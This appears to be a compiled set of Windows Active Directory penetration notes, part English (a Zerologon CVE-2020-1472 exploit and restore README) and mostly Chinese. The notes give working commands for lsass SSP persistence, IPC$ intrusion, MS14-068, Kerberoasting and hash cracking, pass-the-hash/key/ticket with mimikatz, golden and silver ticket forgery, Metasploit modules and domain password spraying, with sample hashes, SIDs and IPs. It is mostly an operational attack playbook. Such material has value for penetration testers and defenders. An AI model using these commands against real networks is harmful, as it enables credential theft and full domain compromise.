Requires the latest impacket from GitHub with added netlogon structures.

Do note that by default this changes the password of the domain controller account. Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this!

More info and original research here

Exploit steps

• Read the blog/whitepaper above so you know what you’re doing
• Run cve-2020-1472-exploit.py with IP and netbios name of DC
• DCSync with secretsdump, using -just-dc and -no-pass or empty hashes and the DCHOSTNAME$ account

Restore steps

If you make sure that this line in secretsdump passes (so make it if True: for example) secretsdump will also dump the plaintext (hex encoded) machine account password from the registry. You can do this by running it against the same DC and using a DA account.

Alternatively you can dump this same password by first extracting the registry hives and then running secretsdump offline (it will then always print the plaintext key because it can’t calculate the Kerberos hashes, this saves you modifying the library).

With this password you can run restorepassword.py with the -hexpass parameter. This will first authenticate with the empty password to the same DC and then set the password back to the original one. Make sure you supply the netbios name and IP again as target, so for example:

python restorepassword.py testsegment/s2016dc@s2016dc -target-ip 192.168.222.113 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3...etc

简介

来源：
Security Support Provider

SSP：
Security Support Provider，直译为安全支持提供者，又名Security Package.简单的理解为SSP就是一个DLL，用来实现身份认证

SSPI：
Security Support Provider Interface，直译为安全支持提供程序接口，是Windows系统在执行认证操作所使用的API。简单的理解为SSPI是SSP的API接口

LSA：
Local Security Authority，用于身份认证，常见进程为lsass.exe.特别的地方在于LSA是可扩展的，在系统启动的时候SSP会被加载到进程lsass.exe中.
这相当于我们可以自定义一个dll，在系统启动的时候被加载到进程lsass.exe！

测试

使用注册表

• 添加SSP
  

• 修改注册表位置
  

• 添加mimilib.dll
  

• 重启系统验证
  

进程注入（重启失效）

IPC$入侵

• 建立非空连接
  

• 新建批处理
  

• Copy命令上传
  

• 查看目标靶机时间
  

• 通过at命令在特定时间执行批处理文件
  

• 在目标靶机上查看
  

其他命令

• 将目标共享建立一个映射g盘
  net use g: \\192.168.3.68\c$
  

• 查看已建立的会话
  

通过工具进行会话连接执行

psexec.exe  \\192.168.1.108   cmd  -uadministrator   -p  123456

csript.exe  wmiexec.vbs   /shell   192.168.1.108   administrator   123456

返回一个cmd交互界面执行即可

MS14068

• 首先尝试访问域控共享文件夹
  
  拒绝访问

• 使用ms16048

-u 域账号+@+域名称
-p 为当前用户的密码，即 ts1 的密码
-s 为 ts1 的 SID 值，可以通过 whoami /all 来获取用户的 SID 值 -d 为当前域的域控

• 生成ccache文件
  

• 删除当前缓存的kerboeos票据
  kerberos::purge
  

• 导入ccache文件
  kerberos::ptc
  

• 再次访问域控共享文件
  

Kerberoating

早期kerberoating

工具 Kerberoast工具包 Mimikatz

• 使用Kerberoast工具包GetUserPNs.ps1进行SPN扫描

• 根据微软提供的类KerberosRequeststorSecurityToken发起Kerberos请求申请票据
  Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SRC_DB_ODAY.org:1433"
  

• 通过klist命令查看当前会话存储的Kerberos票据
  klist
  

• 使用mimikatz导出
  kerberos::list /export
  

• 使用kerberoast 工具集中的 tgsrepcrack.py 工具进行离线爆破
  python tgsrepcrack.py list1.txt 2-40a00000-jack@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi
  

kerberoating新姿势

工具 Invoke-Kerberoast.ps1 HashCat

• 转为Hashcat格式
  Invoke-kerberoast –outputformat hashcat | fl
  
• 保存
  nvoke-Kerberoast -Outputformat Hashcat | fl > test1.txt

• Hashcat爆破
  hashcat64.exe –m 13100 test1.txt password.list --force

Pth

Pass the hash

• 使用mimikatz先获取hash

privilege::debug

sekurlsa::logonpasswords

• 攻击机执行

mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:SRV-DB-0DAY /ntlm:ac307fdeab3e8307c3892c163a7808d5"

• 验证pth

wmiexec

• Invoke-SMBExec

https://github.com/Kevin-Robertson/Invoke-TheHash

Invoke-WMIExec -Target 192.168.3.21 -Domain workgroup -Username administrator -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose

• Invoke-SMBExec

Invoke-SMBExec -Target 192.168.3.21 -Domain test.local -Username test1 -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose

如果只有SMB文件共享的权限，没有远程执行权限，可以使用该脚本

• wmiexec.py

https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py

https://github.com/maaaaz/impacket-examples-windows

wmiexec -hashes 00000000000000000000000000000000:ccef208c6485269c20db2cad21734fe7 workgroup/administrator@192.168.3.21 "whoami"

普通用户可用

CrackMapExec

https://github.com/byt3bl33d3r/CrackMapExec.git

crackmapexec 192.168.3.0/24 -u administrator -H ccef208c6485269c20db2cad21734fe7

Ptk

对于8.1/2012r2，安装补丁kb2871997的Win 7/2008r2/8/2012，可以使用AES keys代替NT hash

• 获取用户的aes key

mimikatz "privilege::debug" "sekurlsa::ekeys"

• 注入aes key

mimikatz "privilege::debug" "sekurlsa::pth /user:sqlsvr /domain:0DAY.ORG /aes256:bf2cab4e27a426c9ec9d21c919f119843415ee5d98587063d6e48d16633c5436" 

Ptt

Golden ticket(黄金票据)

前提：
域名称
域SID
krbtgt账户密码
伪造用户名

• dump krbtgt hash

privilege::debug
lsadump::lsa /patch

• 生成ticket

kerberos::golden  /admin:administrator  /domain:0day.org /sid: S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36f9d9e6d98ecf8307baf4f46ef842a2  /ticket:test.kiribi

• 注入凭据

kerberos::ptt test.kirbi

– 验证Golden ticket

golden ticket（白银票据）

前提：
域名称
域SID
域的服务账户的密码hash
伪造用户名

• dump server hash

privilege::debug
sekurlsa::logonpasswords

• 导入凭证

kerberos::golden /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /target:192.168.3.142 /rc4:74cca677f85c7c566352fd846eb0d82a  /service:cifs /user:syst1m /ptt

• 验证

Tips

mimikatz复制粘贴困难，可使用如>>log.txt

exploit/windows/smb/psexec 使用hash传递

post/windows/gather/smart_hashdump 读取hash

.domain_list_gen 获取域管理账户列表

auxiliary/gather/kerberos_enumusers 用户名枚举

auxiliary/admin/kerberos/ms14_068_kerberos_checksum 14068

load kiwi
kerberos_ticket_use /tmp/0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi kiwi扩展来导入TGT票证
参考：https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit/

• Mimikatz

load mimikatz 加载
mimikatz_command -f version  版本
mimikatz_command -f fu 获取可用模块列表
msv 检索msv凭证
wdigest 读取密码
kerberos 尝试检索kerberos凭据

看到了再加～

在拿到一台内网服务器之后，想要进行进一步的域渗透时，如果在内网中有着庞大的用户列表，你会怎么办？

powershell脚本

DomainPasswordSpray是一个powershell脚本，主要原理是先来抓取域用户账号，然后指定密码字典进行域认证。认证通过的就是密码正确的了。

Github地址

贴出了@倾旋大佬优化后的ps1脚本

简单使用

Invoke-DomainPasswordSpray -Password chabug

这个命令会从当前的域中生成用户列表，然后将每个用户名和chabug的密码组合进行枚举认证。

参数详解

• Domain 指定要测试的域名
• RemoveDisabled 尝试从用户列表删除禁用的账户
• RemovePotentialLockouts 删除锁定账户
• UserList 自定义用户列表(字典)。 如果未指定，这将自动从域中获取
• Password 指定单个密码进行口令测试
• PasswordList 指定一个密码字典
• OutFile 将结果保存到某个文件
• Force 当枚举出第一个后继续枚举，不询问

使用例子

C:\PS> Get-DomainUserList

该命令将从域中收集用户列表。

C:\PS> Get-DomainUserList -Domain 域名 -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt

该命令将收集域“域名”中的用户列表，包括任何未被禁用且未接近锁定状态的帐户。 它会将结果写“入“userlist.txt”文件中

C:\PS> Invoke-DomainPasswordSpray -Password Winter2016

该命令将会从域环境中获取用户名，然后逐个以密码Winter2016进行认证枚举

C:\PS> Invoke-DomainPasswordSpray -UserList users.txt -Domain 域名 -PasswordList passlist.txt -OutFile sprayed-creds.txt

该命令将会从users.txt中提取用户名，与passlist.txt中的密码对照成一对口令，进行域认证枚举，登录成功的结果将会输出到sprayed-creds.txt

希望对你的渗透之路有帮助。

本文引用或涉及的文章链接：

http://payloads.online/archivers/2018-05-02/1

http://payloads.online/scripts/Invoke-DomainPasswordSpray.txt

https://github.com/dafthack/DomainPasswordSpray